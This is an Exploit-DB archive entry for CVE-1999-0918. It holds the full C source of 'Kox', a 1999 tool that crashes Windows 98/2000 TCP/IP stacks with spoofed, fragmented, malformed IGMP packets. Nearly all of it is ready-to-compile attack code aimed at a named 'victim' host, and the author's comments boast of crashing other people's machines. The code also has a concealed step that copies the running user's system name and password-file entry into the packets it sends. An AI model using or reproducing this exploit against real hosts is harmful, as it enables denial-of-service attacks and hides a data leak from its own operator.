Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 1

1999-07-03T00:00:00
ID EDB-ID:19413
Type exploitdb
Reporter Coolio
Modified 1999-07-03T00:00:00

Description

Windows 95/98,Windows NT Enterprise Server 4.0 SP5,Windows NT Terminal Server 4.0 SP4,Windows NT Workstation 4.0 SP5 (1). CVE-1999-0918 . Dos exploit for win...

                                        
                                            source: http://www.securityfocus.com/bid/514/info


The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. 

/***
        Kox by Coolio (coolio@k-r4d.com)

        this was a successful attempt to duplicate klepto/defile's kod win98
        exploit and add spoofing support to it. me and defile made this a
        race to see who could do spoofing kod first. he won. (mine's better!)
        my kox and defile's skod output about the same packets
        but he had skod working a few hours before i had kox working.

        affected systems: windows 98, windows 98 SE, windows 2000 build 2000
        results: bluescreen, tcp/ip stack failure, lockup, or instant reboot

        thanks to klepto and defile for making kod, psilord for wanting
        to understand what we were doing, greg for telling me about iphdr.ihl,
        mancide for letting me use his win98 boxen to test on, and the
        few other people i crashed trying to get this working right.

        also thanks to the authors of elvis for making such a badass editor.
***/



#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <pwd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>



void usage(char *arg)
{
        printf("Kox by Coolio (coolio@k-r4d.com)\n");
        printf("Usage: %s <victim>\n", arg);
        exit(1);
}


unsigned int randip()
{
        struct hostent *he;
        struct sockaddr_in sin;
        char *buf = (char *)calloc(1, sizeof(char) * 16);

        sprintf(buf, "%d.%d.%d.%d",
                (random()%191)+23,
                (random()%253)+1,
                (random()%253)+1,
                (random()%253)+1); 

        inet_aton(buf, (struct in_addr *)&sin);
        return sin.sin_addr.s_addr;
}

unsigned short in_cksum(unsigned short *buh, int len)
{
        register long sum = 0;
        unsigned short oddbyte;
        register unsigned short answer;

        while(len > 1) {
                sum += *buh++;
                len -= 2;
        }

        if(len == 1) {
                oddbyte = 0;
                *((unsigned char *)&oddbyte) = *(unsigned char *)buh;
                sum += oddbyte;
        }

        sum = (sum >> 16) + (sum & 0xFFFF);
        sum += (sum >> 16);
        answer = ~sum;
        return answer;
}

int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
{
        int BIGIGMP = 1500;
        unsigned char *pkt;
        struct iphdr *ip;
        struct igmphdr *igmp;
        struct utsname *un;
        struct passwd *p;

        int i, s;
        int id = (random() % 40000) + 500;

        pkt = (unsigned char *)calloc(1, BIGIGMP);
        ip = (struct iphdr *)pkt;
        igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));

        ip->version = 4;
        ip->ihl = (sizeof *ip) / 4;
        ip->ttl = 255;
        ip->tot_len = htons(BIGIGMP);
        ip->protocol = IPPROTO_IGMP;
        ip->id = htons(id);
        ip->frag_off = htons(IP_MF);
        ip->saddr = spoof;
        ip->daddr = victim->sin_addr.s_addr;
        ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));

        igmp->type = 0;
        igmp->group = 0;
        igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));

        for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
            i < BIGIGMP; i++)
                pkt[i] = random() % 255;
#ifndef I_GROK
        un = (struct utsname *)(pkt + sizeof(struct iphdr) +
              sizeof(struct igmphdr) + 40);
        uname(un);
        p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
        memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif
        if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                perror("error: socket()");
                return 1;
        }

        if(sendto(s, pkt, BIGIGMP, 0, victim,
           sizeof(struct sockaddr_in)) == -1) { 
                perror("error: sendto()");
                return 1;
        }
        usleep(1000000);

        for(i = 1; i < 5; i++) {
                if(i > 3)
                        ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
                else
                        ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
                sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
                usleep(2000000);
        }

        free(pkt);
        close(s);
        return 0;
}

int main(int argc, char *argv[])
{
        struct sockaddr_in victim;
        struct hostent *he;
        int i;

        srandom(time(NULL));

        if(argc < 2)
                usage(argv[0]);

        if((he = gethostbyname(argv[1])) == NULL) {
                herror(argv[1]);
                exit(1);
        }
        memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
        victim.sin_port = htons(0);
        victim.sin_family = PF_INET;

        printf("IGMP> ");
        fflush(stdout);
        for(i = 0; i < 10; i++)
        {
                nuke_igmp(&victim, randip());
                printf(".");
                fflush(stdout);
        }
        printf("\n");
        fflush(stdout);
}